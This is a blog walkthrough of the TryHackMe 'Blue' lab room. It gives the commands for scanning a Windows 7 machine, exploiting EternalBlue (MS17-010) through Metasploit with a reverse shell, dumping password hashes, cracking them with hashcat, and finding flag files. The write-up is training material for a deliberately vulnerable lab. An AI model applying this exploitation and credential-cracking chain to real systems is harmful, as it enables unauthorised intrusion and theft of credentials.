TryHackMe: Blue

Walkthrough

Hola folks, Naman this side. Hope you are doing good on your side of the screen. So, let’s start exploiting our room.

Also, I made this little thumbnail for this blog, lemme me know how it is :)

Recon:

At initials, I would like to export IP to save time XD. Later you can use it with $IP

So, let’s start with rustscan, it’s a faster tool to find open ports:

rustscan -a $IP | tee rustscan.txt

| ‘tee’ for saving the file

Rustscan Log

Now then we have open ports, let’s begin with Nmap:

nmap -A -Pn -oN nmap.txt $IP

| -A for all, -Pn for ignoring ping, -oN for saving the output

Nmap Log

Now we can see that port 139 is using Windows 7 Professional 7601 Service Pack 1 netbios-ssn . After some searching, it was vulnerable, and the exploit is known as

‘EternalBlue’ SMB Remote Code Execution (MS17–010)

Getting Shell:

Now we know how to exploit, then what are we waiting for:

I used to metasploit for exploiting the same.

msfconsole -q

| -q for accessing the direct interface

Now search for the exploit

Searching Exploit

Now it’s time to use exploit and set payload for the reverse shell.

use 0 or use exploit/windows/smb/ms17_010_eternalblue

set payload and run / exploit

Shell Upgrade: Meterpreter

search shell_to_meterpreter and use it

set SESSION 1 and run

Cracking:

let’s run another open session

I don’t know why, but my session is getting closed till I got 5th session

assess it via sessions -i <session ID>

Getting Hash dump:

| From now, screenshots will have another appearance coz used terminator instead of terminal.

run post/windows/gather/hashdump

Hashdump

Crack it using hashcat

hashcat --username -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

And we got, Password of Jon: alqfna22

Flags:

It’s flag time, YO!!

simply search it 🤷‍♂️, HOW? Let’s see

dir *.txt /s

flag search 1

But it’s not showing flag 2. Let’s to deep

dir flag* /s /p

flag search 2

flag1.txt C:\flag1.txt
flag2.txt C:\Windows\System32\config\flag2.txt
flag3.txt C:\Users\Jon\Documents\flag3.txt

Now we have successfully completed the Blue Room of TryHackMe.

If you came this far then make sure you give your time to provide feedback. It will be much appreciated ❤

• || Room || Twitter || GitHub || Instagram ||